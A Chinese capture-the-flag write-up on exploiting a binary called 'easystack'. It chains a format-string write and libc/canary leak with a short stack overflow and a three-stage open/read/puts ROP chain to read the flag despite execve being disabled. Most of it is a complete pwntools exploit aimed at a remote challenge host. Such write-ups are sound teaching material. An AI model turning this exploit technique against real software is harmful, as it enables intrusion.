-
-
[原创]禁用execve并限制溢出长度orw绕过
-
2022-10-30 17:09 12224
-
前言
业余时间更新,周末帮同学远程看了看题。记录一下。
ida
将程序拖入ida中,发现在sub_401474()函数中有格式化字符串漏洞
我们可以通过格式化任意地址写把v1[0]写成0x1234,同时任意地址读获得libc地址。
绕过上面的之后 然后main函数里有个栈溢出
但禁用了exevce函数,
所以选择orw将flag给读出来。但溢出的长度有限,返回的时候将open read puts函数分三次去执行,每执行一次函数之后就返回到main函数将程序重新执行。
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 | #coding:utf8 from pwn import * context(arch = "amd64" ,os = 'linux' ,log_level = "debug" ) p = process( "./easystack" ) p = remote( "47.92.207.120" , 29254 ) elf = ELF( "./easystack" ) libc = ELF( "libc-2.31.so" ) p.recvuntil( "Please input: " ) pd = "%" + str ( 0x1234 ) + "c%7$n" + "########" + "%33$p" + "@@" + "%13$p" p.sendline(pd) p.recvuntil( "########0x" ) libc_addr = int (p.recv( 12 ), 16 ) - 243 - libc.symbols[ '__libc_start_main' ] p.recvuntil( "@@0x" ) canary = int (p.recv( 16 ), 16 ) system_addr = libc_addr + libc.symbols[ 'system' ] binsh_addr = libc_addr + libc.search( "/bin/sh" ). next () pop_rdi_ret = libc_addr + libc.search(asm( "pop rdi\nret" )). next () pop_rsi_ret = libc_addr + libc.search(asm( "pop rsi\nret" )). next () pop_rdx_ret = libc_addr + 0x142c92 open_addr = libc_addr + libc.symbols[ 'open' ] free_hook = libc_addr + libc.symbols[ '__free_hook' ] read_addr = libc_addr + libc.symbols[ 'read' ] puts_addr = libc_addr + libc.symbols[ 'puts' ] print ( "canary : " + hex (canary)) print ( "pop_rdi_ret : " + hex (pop_rdi_ret)) print ( "system_addr : " + hex (system_addr)) print ( "binsh_addr : " + hex (binsh_addr)) print ( "libc_addr : " + hex (libc_addr)) #open(flag) p.recvuntil( ">> " ) p.sendline( "1" ) pd = "a" * ( 0x70 - 0x8 ) + p64(canary) + p64( 0xdeadbeef ) pd + = p64(pop_rsi_ret) + p64( 0 ) + p64(open_addr) + p64( 0x401511 ) print ( hex ( len (pd))) p.sendline(pd) p.recvuntil( ">> " ) p.sendline( "3flag\x00" ) #read(3,free_hook,0x30) p.recvuntil( "Please input: " ) pd = "%" + str ( 0x1234 ) + "c%7$n" p.sendline(pd) p.recvuntil( ">> " ) p.sendline( "1" ) pd = "a" * ( 0x70 - 0x8 ) + p64(canary) + p64( 0xdeadbeef ) pd + = p64(pop_rdi_ret) + p64( 3 ) + p64(pop_rsi_ret) + p64(free_hook) + p64(pop_rdx_ret) + p64( 0x30 ) + p64(read_addr) + p64( 0x401511 ) p.sendline(pd) print ( hex ( len (pd))) p.recvuntil( ">> " ) p.sendline( "3" ) #puts(free_hook) p.recvuntil( "Please input: " ) pd = "%" + str ( 0x1234 ) + "c%7$n" p.sendline(pd) p.recvuntil( ">> " ) p.sendline( "1" ) pd = "a" * ( 0x70 - 0x8 ) + p64(canary) + p64( 0xdeadbeef ) pd + = p64(pop_rdi_ret) + p64(free_hook) + p64(puts_addr) #puts(a) p.sendline(pd) print ( hex ( len (pd))) p.recvuntil( ">> " ) p.sendline( "3" ) p.interactive() |
成功拿到flag。
赞赏
他的文章
看原图